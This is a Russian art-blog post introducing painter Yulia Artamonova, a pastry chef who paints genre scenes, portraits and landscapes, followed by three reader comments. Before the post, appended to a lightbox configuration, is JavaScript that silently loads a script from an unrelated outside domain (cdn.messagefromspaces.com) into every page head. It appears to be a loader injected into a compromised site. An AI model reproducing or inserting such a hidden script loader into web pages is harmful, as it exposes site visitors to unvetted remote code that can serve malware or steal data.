, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Художница Артамонова Юлия

Автор: Дмитрий Алмазов | 16 Апр 2011

Художница Артомонова ЮлияЗдравствуйте читатели сегодня хочу представить Вам художницу  Артамонову Юлию. Её картины такие как «Мексика», «Девочка на кухне», «Вид из-под моста на мельницу» Вы уже могли видеть на  сайте. Артамоновой Юлии сейчас  34 года,  живет в городе Санкт-Питербург.

Основная профессия Юли не связана напрямую с искусством (кондитер), но она достигла успехов на профессиональном поприще именно благодаря своему творческому видению и мышлению, которое сопровождает ее с самых юных лет. Торты в виде картин с изображением пейзажа или портрета, в форме животного или человека - такое под силу не каждому.

Живописью Юлия предпочитает заниматься дома, создавая картины самых разнообразных сюжетов - это и жанроваая живопись, и потрет, и пейзаж. За небольшое время серьезного творческого процесса она создала коллекцию достойных примеров, которые украшают сейчас интерьеры многих домов.

Купить картины Артамоновой Юлии Вы можете в нашем интернет магазине.

Подписаться на выход новых картин и статей Вы можете тут.

Темы: Новости, Художник | Отзывов: 3 »

Отзывов: 3 на “Художница Артамонова Юлия”

  1. Юлия пишет:
    17 Апр 2011 в 02:30

    Мне нравится, когда профессия сочетается с хобби. Когда прочитала, что художница – кондитер, сразу подумала, что можно этот талант использовать и в кондитерских изделиях.

    Может быть, ей даже стоит открыть курсы по обучению такому направлению в кулинарии (роспись тортов).

    Хорошо было бы, если бы на этом блоге появились фотографии этих тортов в виде картин – можно в отдельной статье с кратким описанием.

  2. Олег Кутехов пишет:
    19 Апр 2011 в 09:54

    У Юлии, должно быть, очень живописные плюшки должны получаться:)

  3. Марина пишет:
    20 Окт 2012 в 00:58

    Юлия, ваши картины удивительные. Он создают какое-то особенное настроение и затрагивают потаенные струны души. И еще…навевают воспоминания из детства. Спасибо

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress